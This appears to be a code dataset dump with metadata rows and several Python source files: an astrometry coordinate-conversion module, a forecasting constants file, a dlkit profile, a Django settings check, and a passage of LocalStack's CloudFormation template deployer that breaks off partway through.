hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
83d488207b28894daff8275af6a62362232de84e | 5,373 | py | Python | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 6 | 2019-08-14T08:40:13.000Z | 2022-03-17T08:28:43.000Z | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 2 | 2015-11-30T01:46:00.000Z | 2015-11-30T01:46:13.000Z | src/astrometry_azel/base.py | scienceopen/astrometry | b24fbe690d0336cc8bcdeadb2711b40cdf55d171 | [
"0BSD"
] | 1 | 2018-10-26T02:39:32.000Z | 2018-10-26T02:39:32.000Z | from __future__ import annotations
from pathlib import Path
import subprocess
import shutil
import logging
import warnings
from dateutil.parser import parse
from datetime import datetime
from numpy import meshgrid, column_stack
import xarray
from astropy.io import fits # instead of obsolete pyfits
from astropy.wcs import wcs
try:
import pymap3d
except ImportError:
pymap3d = None
def fits2radec(
fitsfn: Path, WCSfn: Path = None, solve: bool = False, args: str = None
) -> xarray.Dataset:
fitsfn = Path(fitsfn).expanduser()
if WCSfn is None:
if fitsfn.suffix in (".fits", ".new"):
# using .wcs will also work but gives a spurious warning
WCSfn = fitsfn.with_suffix(".wcs")
elif fitsfn.suffix == ".wcs":
WCSfn = fitsfn
else:
raise ValueError(f"please convert {fitsfn} to GRAYSCALE .fits")
if solve:
if not doSolve(fitsfn, args):
logging.error(f"{fitsfn} was not solved")
return None
if not WCSfn.is_file():
WCSfn = WCSfn.parent / (WCSfn.stem + "_stack.wcs")
if not WCSfn.is_file():
logging.error(f"it appears {fitsfn} was not solved as {WCSfn} is not found")
return None
with fits.open(fitsfn, mode="readonly") as f:
yPix, xPix = f[0].shape[-2:]
x, y = meshgrid(range(xPix), range(yPix)) # pixel indices to find RA/dec of
xy = column_stack((x.ravel(order="C"), y.ravel(order="C")))
# %% use astropy.wcs to register pixels to RA/DEC
"""
http://docs.astropy.org/en/stable/api/astropy.wcs.WCS.html#astropy.wcs.WCS
naxis=[0,1] is to take x,y axes in case a color photo was input e.g. to astrometry.net cloud solver
"""
with fits.open(WCSfn, mode="readonly") as f:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
radec = wcs.WCS(f[0].header).all_pix2world(xy, 0)
# radec = wcs.WCS(hdul[0].header,naxis=[0,1]).all_pix2world(xy, 0)
ra = radec[:, 0].reshape((yPix, xPix), order="C")
dec = radec[:, 1].reshape((yPix, xPix), order="C")
# %% collect output
radec = xarray.Dataset(
{"ra": (("y", "x"), ra), "dec": (("y", "x"), dec)},
{"x": range(xPix), "y": range(yPix)},
attrs={"filename": str(fitsfn)},
)
return radec
def radec2azel(
scale: xarray.Dataset, latlon: tuple[float, float], time: datetime
) -> xarray.Dataset:
if pymap3d is None:
logging.error("azimuth, elevation computations require: pip install pymap3d")
return None
if latlon is None:
return None
if not isinstance(scale, xarray.Dataset):
return None
if time is None:
with fits.open(scale.filename, mode="readonly") as f:
try:
t = f[0].header["FRAME"] # TODO this only works from Solis?
except KeyError:
return None
time = parse(t)
logging.info("using FITS header for time")
elif isinstance(time, datetime):
pass
elif isinstance(time, (float, int)): # assume UT1_Unix
time = datetime.utcfromtimestamp(time)
else: # user override of frame time
time = parse(time)
print("image time:", time)
# %% knowing camera location, time, and sky coordinates observed, convert to az/el for each pixel
# .values is to avoid silently freezing AstroPy
az, el = pymap3d.radec2azel(scale["ra"].values, scale["dec"].values, *latlon, time)
if (el < 0).any():
Nbelow = (el < 0).nonzero()
logging.error(
f"{Nbelow} points were below the horizon."
"Currently this program assumed observer ~ ground level."
"Please file a bug report if you need observer off of Earth surface"
)
# %% collect output
scale["az"] = (("y", "x"), az)
scale["el"] = (("y", "x"), el)
scale.attrs["lat"] = latlon[0]
scale.attrs["lon"] = latlon[1]
scale.attrs["time"] = time
return scale
def doSolve(fitsfn: Path, args: str = None) -> bool:
"""
Astrometry.net from at least version 0.67 is OK with Python 3.
"""
solve = shutil.which("solve-field")
if not solve:
raise FileNotFoundError("Astrometry.net solve-file exectuable not found")
if isinstance(args, str):
opts = args.split(" ")
elif args is None:
args = []
# %% build command
cmd = [solve, "--overwrite", str(fitsfn)]
cmd += opts
print("\n", " ".join(cmd), "\n")
# %% execute
ret = subprocess.check_output(cmd, universal_newlines=True)
# solve-field returns 0 even if it didn't solve!
print(ret)
fitsfn.with_suffix(".log").write_text(" ".join(cmd) + "\n\n" + ret)
if "Did not solve" in ret:
logging.error(f"could not solve {fitsfn}")
return False
else:
return True
def fits2azel(
fitsfn: Path,
*,
wcsfn: Path = None,
latlon: tuple[float, float] = None,
time: datetime = None,
solve: bool = False,
args: str = None,
) -> xarray.Dataset:
fitsfn = Path(fitsfn).expanduser()
radec = fits2radec(fitsfn, wcsfn, solve, args)
if radec is None:
return None
# if az/el can be computed, scale is implicitly merged with radec.
scale = radec2azel(radec, latlon, time)
if scale is None:
scale = radec
return scale
| 31.421053 | 103 | 0.607854 |
085d24dfe8b6b9cd9d2c556eaee5a770b0f7ec31 | 478 | py | Python | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | null | null | null | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | null | null | null | constants.py | ManeeshaPerera/forecast-framework | 60a22af4a97aec10c8bbea7f3f833061283382cb | [
"BSD-3-Clause"
] | 2 | 2022-03-20T10:30:38.000Z | 2022-03-22T06:39:14.000Z | DATA = 'data/'
RESULTS = 'results/'
# a dictionary including all information relevant to the forecast horizon and resolution
HORIZON_INFO = {
'1D': {
'resolution': 'H',
'horizon_as_int': 24,
'resolution_as_str': '1H',
'seasonality': 24,
'arima_params': {
'seasonal_freq': 24,
'seasonality': False,
'fourier': True,
'fourier_terms': None,
'maxiter': None,
}
}
}
| 23.9 | 88 | 0.527197 |
e55ad886ce15434ffc995a6675a5cdabe4ceb8f2 | 1,197 | py | Python | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | dlkit/json_/cataloging/profile.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """Mongo osid profile elements for cataloging service packages"""
# -*- coding: utf-8 -*-
# pylint: disable=unused-import
# importing common values to be used by cataloging.ProfileManger implementation
from ..profile import ID
from ..profile import LANGUAGETYPE
from ..profile import SCRIPTTYPE
from ..profile import FORMATTYPE
from ..profile import VERSIONSCHEME
from ..profile import LOCALES
from ..profile import LICENSE
from ..profile import PROVIDERID
from ..profile import OSIDVERSION
DISPLAYNAME = 'Mongo cataloging'
DESCRIPTION = 'MongoDB based cataloging implementation'
VERSIONCOMPONENTS = [0, 1, 45]
RELEASEDATE = "2018-03-08"
SUPPORTS = [ # 'Remove the # when implementations exist:'
# 'supports_journal_rollback',
# 'supports_journal_branching',
# 'supports_visible_federation',
# 'supports_catalog',
# 'supports_catalog_assignment',
# 'supports_catalog_entry_notification',
'supports_catalog_lookup',
'supports_catalog_query',
# 'supports_catalog_search',
'supports_catalog_admin',
# 'supports_catalog_notification',
'supports_catalog_hierarchy',
'supports_catalog_hierarchy_design',
# 'supports_cataloging_rules',
]
| 29.925 | 82 | 0.754386 |
c0d8d0a779b605271fd586adcd529e8b9e628821 | 1,052 | py | Python | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 123 | 2015-01-15T06:56:45.000Z | 2022-03-19T22:18:55.000Z | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 21 | 2015-03-25T18:00:33.000Z | 2019-08-12T17:11:10.000Z | Lib/site-packages/django/core/checks/compatibility/django_1_8_0.py | ashutoshsuman99/Web-Blog-D19 | a01a0ccc40e8823110c01ebe4f43d9351df57295 | [
"bzip2-1.0.6"
] | 72 | 2015-01-14T16:29:47.000Z | 2021-10-09T16:31:47.000Z | from __future__ import unicode_literals
from django.conf import global_settings, settings
from .. import Tags, Warning, register
@register(Tags.compatibility)
def check_duplicate_template_settings(app_configs, **kwargs):
if settings.TEMPLATES:
values = [
'TEMPLATE_DIRS',
'ALLOWED_INCLUDE_ROOTS',
'TEMPLATE_CONTEXT_PROCESSORS',
'TEMPLATE_DEBUG',
'TEMPLATE_LOADERS',
'TEMPLATE_STRING_IF_INVALID',
]
duplicates = [
value for value in values
if getattr(settings, value) != getattr(global_settings, value)
]
if duplicates:
return [Warning(
"The standalone TEMPLATE_* settings were deprecated in Django "
"1.8 and the TEMPLATES dictionary takes precedence. You must "
"put the values of the following settings into your default "
"TEMPLATES dict: %s." % ", ".join(duplicates),
id='1_8.W001',
)]
return []
| 32.875 | 79 | 0.595057 |
f37b7d7fe28b041512a178366e7c817fbfe35c34 | 86,125 | py | Python | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/utils/cloudformation/template_deployer.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | import re
import os
import json
import base64
import logging
import traceback
from urllib.parse import urlparse
from six import iteritems
from moto.ec2.utils import generate_route_id
from moto.core import CloudFormationModel as MotoCloudFormationModel
from moto.cloudformation import parsing
from moto.cloudformation.models import cloudformation_backends
from localstack import config
from localstack.utils import common
from localstack.utils.aws import aws_stack
from localstack.constants import TEST_AWS_ACCOUNT_ID, FALSE_STRINGS
from localstack.services.s3 import s3_listener
from localstack.utils.common import (
json_safe, md5, canonical_json, short_uid, to_str, to_bytes,
mkdir, cp_r, prevent_stack_overflow, start_worker_thread, get_all_subclasses)
from localstack.utils.testutil import create_zip_file, delete_all_s3_objects
from localstack.utils.cloudformation import template_preparer
from localstack.services.awslambda.lambda_api import get_handler_file_from_name
from localstack.services.cloudformation.service_models import GenericBaseModel, DependencyNotYetSatisfied
from localstack.services.cloudformation.deployment_utils import (
dump_json_params, select_parameters, param_defaults, remove_none_values, get_cfn_response_mod_file,
lambda_keys_to_lower, PLACEHOLDER_AWS_NO_VALUE, PLACEHOLDER_RESOURCE_NAME)
ACTION_CREATE = 'create'
ACTION_DELETE = 'delete'
AWS_URL_SUFFIX = 'localhost' # value is "amazonaws.com" in real AWS
IAM_POLICY_VERSION = '2012-10-17'
LOG = logging.getLogger(__name__)
# list of resource types that can be updated
# TODO: make this a property of the model classes themselves
UPDATEABLE_RESOURCES = [
'Lambda::Function', 'ApiGateway::Method', 'StepFunctions::StateMachine', 'IAM::Role', 'EC2::Instance'
]
# list of static attribute references to be replaced in {'Fn::Sub': '...'} strings
STATIC_REFS = ['AWS::Region', 'AWS::Partition', 'AWS::StackName', 'AWS::AccountId']
# maps resource type string to model class
RESOURCE_MODELS = {model.cloudformation_type(): model for model in get_all_subclasses(GenericBaseModel)}
class NoStackUpdates(Exception):
""" Exception indicating that no actions are to be performed in a stack update (which is not allowed) """
pass
def lambda_get_params():
return lambda params, **kwargs: params
def rename_params(func, rename_map):
def do_rename(params, **kwargs):
values = func(params, **kwargs) if func else params
for old_param, new_param in rename_map.items():
values[new_param] = values.pop(old_param, None)
return values
return do_rename
def get_lambda_code_param(params, **kwargs):
code = params.get('Code', {})
zip_file = code.get('ZipFile')
if zip_file and not common.is_base64(zip_file):
tmp_dir = common.new_tmp_dir()
handler_file = get_handler_file_from_name(params['Handler'], runtime=params['Runtime'])
tmp_file = os.path.join(tmp_dir, handler_file)
common.save_file(tmp_file, zip_file)
# add 'cfn-response' module to archive - see:
# https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-lambda-function-code-cfnresponsemodule.html
cfn_response_tmp_file = get_cfn_response_mod_file()
cfn_response_mod_dir = os.path.join(tmp_dir, 'node_modules', 'cfn-response')
mkdir(cfn_response_mod_dir)
cp_r(cfn_response_tmp_file, os.path.join(cfn_response_mod_dir, 'index.js'))
# create zip file
zip_file = create_zip_file(tmp_dir, get_content=True)
code['ZipFile'] = zip_file
common.rm_rf(tmp_dir)
return code
def events_put_rule_params(params, **kwargs):
attrs = ['ScheduleExpression', 'EventPattern', 'State', 'Description', 'Name']
result = select_parameters(*attrs)(params, **kwargs)
result['Name'] = result.get('Name') or PLACEHOLDER_RESOURCE_NAME
def wrap_in_lists(o, **kwargs):
if isinstance(o, dict):
for k, v in o.items():
if not isinstance(v, (dict, list)):
o[k] = [v]
return o
pattern = result.get('EventPattern')
if isinstance(pattern, dict):
wrapped = common.recurse_object(pattern, wrap_in_lists)
result['EventPattern'] = json.dumps(wrapped)
return result
def es_add_tags_params(params, **kwargs):
es_arn = aws_stack.es_domain_arn(params.get('DomainName'))
tags = params.get('Tags', [])
return {'ARN': es_arn, 'TagList': tags}
def lambda_permission_params(params, **kwargs):
result = select_parameters('FunctionName', 'Action', 'Principal')(params, **kwargs)
result['StatementId'] = common.short_uid()
return result
def get_ddb_provisioned_throughput(params, **kwargs):
args = params.get('ProvisionedThroughput')
if args == PLACEHOLDER_AWS_NO_VALUE:
return {}
if args:
if isinstance(args['ReadCapacityUnits'], str):
args['ReadCapacityUnits'] = int(args['ReadCapacityUnits'])
if isinstance(args['WriteCapacityUnits'], str):
args['WriteCapacityUnits'] = int(args['WriteCapacityUnits'])
return args
def get_ddb_global_sec_indexes(params, **kwargs):
args = params.get('GlobalSecondaryIndexes')
if args:
for index in args:
provisoned_throughput = index['ProvisionedThroughput']
if isinstance(provisoned_throughput['ReadCapacityUnits'], str):
provisoned_throughput['ReadCapacityUnits'] = int(provisoned_throughput['ReadCapacityUnits'])
if isinstance(provisoned_throughput['WriteCapacityUnits'], str):
provisoned_throughput['WriteCapacityUnits'] = int(provisoned_throughput['WriteCapacityUnits'])
return args
def get_apigw_resource_params(params, **kwargs):
result = {
'restApiId': params.get('RestApiId'),
'pathPart': params.get('PathPart'),
'parentId': params.get('ParentId')
}
if not result.get('parentId'):
# get root resource id
apigw = aws_stack.connect_to_service('apigateway')
resources = apigw.get_resources(restApiId=result['restApiId'])['items']
root_resource = ([r for r in resources if r['path'] == '/'] or [None])[0]
if not root_resource:
raise Exception('Unable to find root resource for REST API %s' % result['restApiId'])
result['parentId'] = root_resource['id']
return result
# maps resource types to functions and parameters for creation
RESOURCE_TO_FUNCTION = {
'S3::BucketPolicy': {
'create': {
'function': 'put_bucket_policy',
'parameters': rename_params(dump_json_params(None, 'PolicyDocument'), {'PolicyDocument': 'Policy'})
}
},
'SecretsManager::Secret': {
'create': {
'function': 'create_secret',
'parameters': select_parameters('Name', 'Description', 'SecretString', 'KmsKeyId', 'Tags')
},
'delete': {
'function': 'delete_secret',
'parameters': {
'SecretId': 'Name'
}
}
},
'KinesisFirehose::DeliveryStream': {
'create': {
'function': 'create_delivery_stream',
'parameters': select_parameters('DeliveryStreamName', 'DeliveryStreamType',
'S3DestinationConfiguration', 'ElasticsearchDestinationConfiguration')
},
'delete': {
'function': 'delete_delivery_stream',
'parameters': {
'DeliveryStreamName': 'DeliveryStreamName'
}
}
},
'Elasticsearch::Domain': {
'create': [{
'function': 'create_elasticsearch_domain',
'parameters': select_parameters('AccessPolicies', 'AdvancedOptions', 'CognitoOptions',
'DomainName', 'EBSOptions', 'ElasticsearchClusterConfig', 'ElasticsearchVersion',
'EncryptionAtRestOptions', 'LogPublishingOptions', 'NodeToNodeEncryptionOptions',
'SnapshotOptions', 'VPCOptions')
}, {
'function': 'add_tags',
'parameters': es_add_tags_params
}],
'delete': {
'function': 'delete_elasticsearch_domain',
'parameters': {
'DomainName': 'DomainName'
}
}
},
'Logs::LogGroup': {
'create': {
'function': 'create_log_group',
'parameters': {
'logGroupName': 'LogGroupName'
}
},
'delete': {
'function': 'delete_log_group',
'parameters': {
'logGroupName': 'LogGroupName'
}
}
},
'Lambda::Function': {
'create': {
'function': 'create_function',
'parameters': {
'FunctionName': 'FunctionName',
'Runtime': 'Runtime',
'Role': 'Role',
'Handler': 'Handler',
'Code': get_lambda_code_param,
'Description': 'Description',
'Environment': 'Environment',
'Timeout': 'Timeout',
'MemorySize': 'MemorySize',
# TODO add missing fields
},
'defaults': {
'Role': 'test_role'
},
'types': {
'Timeout': int,
'MemorySize': int
}
},
'delete': {
'function': 'delete_function',
'parameters': {
'FunctionName': 'PhysicalResourceId'
}
}
},
'Lambda::Version': {
'create': {
'function': 'publish_version',
'parameters': select_parameters('FunctionName', 'CodeSha256', 'Description')
}
},
'Lambda::Permission': {
'create': {
'function': 'add_permission',
'parameters': lambda_permission_params
}
},
'Lambda::EventSourceMapping': {
'create': {
'function': 'create_event_source_mapping',
'parameters': select_parameters('FunctionName', 'EventSourceArn', 'Enabled',
'StartingPosition', 'BatchSize', 'StartingPositionTimestamp')
}
},
'DynamoDB::Table': {
'create': {
'function': 'create_table',
'parameters': {
'TableName': 'TableName',
'AttributeDefinitions': 'AttributeDefinitions',
'KeySchema': 'KeySchema',
'ProvisionedThroughput': get_ddb_provisioned_throughput,
'LocalSecondaryIndexes': 'LocalSecondaryIndexes',
'GlobalSecondaryIndexes': get_ddb_global_sec_indexes,
'StreamSpecification': lambda params, **kwargs: (
common.merge_dicts(params.get('StreamSpecification'), {'StreamEnabled': True}, default=None))
},
'defaults': {
'ProvisionedThroughput': {
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
}
}
},
'delete': {
'function': 'delete_table',
'parameters': {
'TableName': 'TableName'
}
}
},
'Events::EventBus': {
'create': {
'function': 'create_event_bus',
'parameters': {
'Name': 'Name'
}
},
'delete': {
'function': 'delete_event_bus',
'parameters': {
'Name': 'Name'
}
}
},
'Events::Rule': {
'create': [{
'function': 'put_rule',
'parameters': events_put_rule_params
}, {
'function': 'put_targets',
'parameters': {
'Rule': PLACEHOLDER_RESOURCE_NAME,
'EventBusName': 'EventBusName',
'Targets': 'Targets'
}
}],
'delete': {
'function': 'delete_rule',
'parameters': {
'Name': 'PhysicalResourceId'
}
}
},
'IAM::Role': {
'create': {
'function': 'create_role',
'parameters':
param_defaults(
dump_json_params(
select_parameters('Path', 'RoleName', 'AssumeRolePolicyDocument',
'Description', 'MaxSessionDuration', 'PermissionsBoundary', 'Tags'),
'AssumeRolePolicyDocument'),
{'RoleName': PLACEHOLDER_RESOURCE_NAME})
},
'delete': {
'function': 'delete_role',
'parameters': {
'RoleName': 'RoleName'
}
}
},
'ApiGateway::Resource': {
'create': {
'function': 'create_resource',
'parameters': get_apigw_resource_params
}
},
'ApiGateway::Method': {
'create': {
'function': 'put_method',
'parameters': {
'restApiId': 'RestApiId',
'resourceId': 'ResourceId',
'httpMethod': 'HttpMethod',
'authorizationType': 'AuthorizationType',
'authorizerId': 'AuthorizerId',
'requestParameters': 'RequestParameters'
}
}
},
'ApiGateway::Method::Integration': {
},
'ApiGateway::Account': {
},
'ApiGateway::Stage': {
'create': {
'function': 'create_stage',
'parameters': lambda_keys_to_lower()
}
},
'ApiGateway::Model': {
'create': {
'function': 'create_model',
'parameters': {
'name': 'Name',
'restApiId': 'RestApiId',
},
'defaults': {
'contentType': 'application/json'
}
}
},
'ApiGateway::Deployment': {
'create': {
'function': 'create_deployment',
'parameters': {
'restApiId': 'RestApiId',
'stageName': 'StageName',
'stageDescription': 'StageDescription',
'description': 'Description'
}
}
},
'ApiGateway::GatewayResponse': {
'create': {
'function': 'put_gateway_response',
'parameters': {
'restApiId': 'RestApiId',
'responseType': 'ResponseType',
'statusCode': 'StatusCode',
'responseParameters': 'ResponseParameters',
'responseTemplates': 'ResponseTemplates'
}
}
},
'Kinesis::Stream': {
'create': {
'function': 'create_stream',
'parameters': {
'StreamName': 'Name',
'ShardCount': 'ShardCount'
},
'defaults': {
'ShardCount': 1
}
},
'delete': {
'function': 'delete_stream',
'parameters': {
'StreamName': 'Name'
}
}
},
'StepFunctions::StateMachine': {
'create': {
'function': 'create_state_machine',
'parameters': {
'name': ['StateMachineName', PLACEHOLDER_RESOURCE_NAME],
'definition': 'DefinitionString',
'roleArn': lambda params, **kwargs: get_role_arn(params.get('RoleArn'), **kwargs)
}
},
'delete': {
'function': 'delete_state_machine',
'parameters': {
'stateMachineArn': 'PhysicalResourceId'
}
}
},
'StepFunctions::Activity': {
'create': {
'function': 'create_activity',
'parameters': {
'name': ['Name', PLACEHOLDER_RESOURCE_NAME],
'tags': 'Tags'
}
},
'delete': {
'function': 'delete_activity',
'parameters': {
'activityArn': 'PhysicalResourceId'
}
}
},
'EC2::Instance': {
'create': {
'function': 'create_instances',
'parameters': {
'InstanceType': 'InstanceType',
'SecurityGroups': 'SecurityGroups',
'KeyName': 'KeyName',
'ImageId': 'ImageId'
},
'defaults': {
'MinCount': 1,
'MaxCount': 1
}
},
'delete': {
'function': 'terminate_instances',
'parameters': {
'InstanceIds': lambda params, **kw: [kw['resources'][kw['resource_id']]['PhysicalResourceId']]
}
}
}
}
# ----------------
# UTILITY METHODS
# ----------------
def get_secret_arn(secret_name, account_id=None):
# TODO: create logic to create static without lookup table!
from localstack.services.secretsmanager import secretsmanager_starter
storage = secretsmanager_starter.SECRET_ARN_STORAGE
key = '%s_%s' % (aws_stack.get_region(), secret_name)
return storage.get(key) or storage.get(secret_name)
def retrieve_topic_arn(topic_name):
topics = aws_stack.connect_to_service('sns').list_topics()['Topics']
topic_arns = [t['TopicArn'] for t in topics if t['TopicArn'].endswith(':%s' % topic_name)]
return topic_arns[0]
def get_role_arn(role_arn, **kwargs):
role_arn = resolve_refs_recursively(kwargs.get('stack_name'), role_arn, kwargs.get('resources'))
return aws_stack.role_arn(role_arn)
def find_stack(stack_name):
from localstack.services.cloudformation.cloudformation_api import find_stack as api_find_stack
return api_find_stack(stack_name)
# ---------------------
# CF TEMPLATE HANDLING
# ---------------------
def get_deployment_config(res_type):
result = RESOURCE_TO_FUNCTION.get(res_type)
if result is not None:
return result
canonical_type = canonical_resource_type(res_type)
resource_class = RESOURCE_MODELS.get(canonical_type)
if resource_class:
return resource_class.get_deploy_templates()
def get_resource_type(resource):
res_type = resource.get('ResourceType') or resource.get('Type') or ''
parts = res_type.split('::', 1)
if len(parts) == 1:
return parts[0]
return parts[1]
def get_service_name(resource):
res_type = resource.get('Type', resource.get('ResourceType', ''))
parts = res_type.split('::')
if len(parts) == 1:
return None
if res_type.endswith('Cognito::UserPool'):
return 'cognito-idp'
if parts[-2] == 'Cognito':
return 'cognito-idp'
if parts[-2] == 'Elasticsearch':
return 'es'
if parts[-2] == 'KinesisFirehose':
return 'firehose'
return parts[1].lower()
def get_resource_name(resource):
properties = resource.get('Properties') or {}
name = properties.get('Name')
if name:
return name
# try to extract name via resource class
res_type = canonical_resource_type(get_resource_type(resource))
model_class = RESOURCE_MODELS.get(res_type)
if model_class:
instance = model_class(resource)
name = instance.get_resource_name()
if not name:
LOG.debug('Unable to extract name for resource type "%s"' % res_type)
return name
def get_client(resource, func_config):
resource_type = get_resource_type(resource)
service = get_service_name(resource)
resource_config = get_deployment_config(resource_type)
if resource_config is None:
raise Exception('CloudFormation deployment for resource type %s not yet implemented' % resource_type)
try:
if func_config.get('boto_client') == 'resource':
return aws_stack.connect_to_resource(service)
return aws_stack.connect_to_service(service)
except Exception as e:
LOG.warning('Unable to get client for "%s" API, skipping deployment: %s' % (service, e))
return None
def describe_stack_resource(stack_name, logical_resource_id):
client = aws_stack.connect_to_service('cloudformation')
try:
result = client.describe_stack_resource(StackName=stack_name, LogicalResourceId=logical_resource_id)
return result['StackResourceDetail']
except Exception as e:
LOG.warning('Unable to get details for resource "%s" in CloudFormation stack "%s": %s' %
(logical_resource_id, stack_name, e))
def retrieve_resource_details(resource_id, resource_status, resources, stack_name):
resource = resources.get(resource_id)
resource_id = resource_status.get('PhysicalResourceId') or resource_id
if not resource:
resource = {}
resource_type = get_resource_type(resource)
resource_props = resource.get('Properties')
if resource_props is None:
raise Exception('Unable to find properties for resource "%s": %s %s' % (resource_id, resource, resources))
try:
# try to look up resource class
canonical_type = canonical_resource_type(resource_type)
resource_class = RESOURCE_MODELS.get(canonical_type)
if resource_class:
instance = resource_class(resource)
state = instance.fetch_and_update_state(stack_name=stack_name, resources=resources)
return state
# special case for stack parameters
if resource_type == 'Parameter':
return resource_props
# fallback: try accessing stack.moto_resource_statuses
stack = find_stack(stack_name)
moto_resource = stack.moto_resource_statuses.get(resource_id)
if moto_resource:
return moto_resource
# if is_deployable_resource(resource):
LOG.warning('Unexpected resource type %s when resolving references of resource %s: %s' %
(resource_type, resource_id, resource))
except DependencyNotYetSatisfied:
return
except Exception as e:
check_not_found_exception(e, resource_type, resource, resource_status)
return None
def check_not_found_exception(e, resource_type, resource, resource_status=None):
# we expect this to be a "not found" exception
markers = ['NoSuchBucket', 'ResourceNotFound', 'NoSuchEntity', 'NotFoundException',
'404', 'not found', 'not exist']
if not list(filter(lambda marker, e=e: marker in str(e), markers)):
LOG.warning('Unexpected error retrieving details for resource %s: %s %s - %s %s' %
(resource_type, e, ''.join(traceback.format_stack()), resource, resource_status))
return False
return True
def extract_resource_attribute(resource_type, resource_state, attribute, resource_id=None,
resource=None, resources=None, stack_name=None):
LOG.debug('Extract resource attribute: %s %s' % (resource_type, attribute))
is_ref_attribute = attribute in ['PhysicalResourceId', 'Ref']
is_ref_attr_or_arn = is_ref_attribute or attribute == 'Arn'
resource = resource or {}
if not resource and resources:
resource = resources[resource_id]
if not resource_state:
resource_state = retrieve_resource_details(resource_id, {}, resources, stack_name) or {}
if isinstance(resource_state, MotoCloudFormationModel):
if is_ref_attribute:
res_phys_id = getattr(resource_state, 'physical_resource_id', None)
if res_phys_id:
return res_phys_id
if hasattr(resource_state, 'get_cfn_attribute'):
try:
return resource_state.get_cfn_attribute(attribute)
except Exception:
pass
raise Exception('Unable to extract attribute "%s" from "%s" model class %s' % (
attribute, resource_type, type(resource_state)))
# extract resource specific attributes
resource_props = resource.get('Properties', {})
if resource_type == 'Parameter':
result = None
param_value = resource_props.get('Value', resource.get('Value',
resource_props.get('Properties', {}).get('Value')))
if is_ref_attr_or_arn:
result = param_value
elif isinstance(param_value, dict):
result = param_value.get(attribute)
if result is not None:
return result
return ''
elif resource_type == 'Lambda::Function':
func_configs = resource_state.get('Configuration') or {}
if is_ref_attr_or_arn:
func_arn = func_configs.get('FunctionArn')
if func_arn:
return resolve_refs_recursively(stack_name, func_arn, resources)
func_name = resolve_refs_recursively(stack_name, func_configs.get('FunctionName'), resources)
return aws_stack.lambda_function_arn(func_name)
else:
return func_configs.get(attribute)
elif resource_type == 'Lambda::Version':
if resource_state.get('Version'):
return '%s:%s' % (resource_state.get('FunctionArn'), resource_state.get('Version').split(':')[-1])
elif resource_type == 'DynamoDB::Table':
actual_attribute = 'LatestStreamArn' if attribute == 'StreamArn' else attribute
value = resource_state.get('Table', {}).get(actual_attribute)
if value:
return value
elif resource_type == 'ApiGateway::RestApi':
if is_ref_attribute:
result = resource_state.get('id')
if result:
return result
if attribute == 'RootResourceId':
api_id = resource_state['id']
resources = aws_stack.connect_to_service('apigateway').get_resources(restApiId=api_id)['items']
for res in resources:
if res['path'] == '/' and not res.get('parentId'):
return res['id']
elif resource_type == 'ApiGateway::Resource':
if is_ref_attribute:
return resource_state.get('id')
elif resource_type == 'ApiGateway::Deployment':
if is_ref_attribute:
return resource_state.get('id')
elif resource_type == 'S3::Bucket':
if is_ref_attr_or_arn:
bucket_name = resource_props.get('BucketName')
bucket_name = resolve_refs_recursively(stack_name, bucket_name, resources)
if attribute == 'Arn':
return aws_stack.s3_bucket_arn(bucket_name)
return bucket_name
elif resource_type == 'Elasticsearch::Domain':
